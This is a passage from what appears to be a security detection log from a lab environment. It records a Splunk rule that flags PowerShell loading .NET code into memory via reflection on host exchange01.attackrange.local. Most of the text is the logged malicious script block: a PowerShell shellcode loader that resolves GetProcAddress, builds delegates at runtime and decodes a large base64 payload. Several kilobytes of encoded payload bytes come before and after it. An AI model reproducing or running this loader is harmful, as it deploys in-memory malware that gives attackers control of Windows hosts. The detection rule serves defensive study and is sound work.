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 to load .net code in memory with EventCode 4104 in host exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664805332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="exchange01.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="Set-StrictMode -Version 2 $DoIt = @' function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('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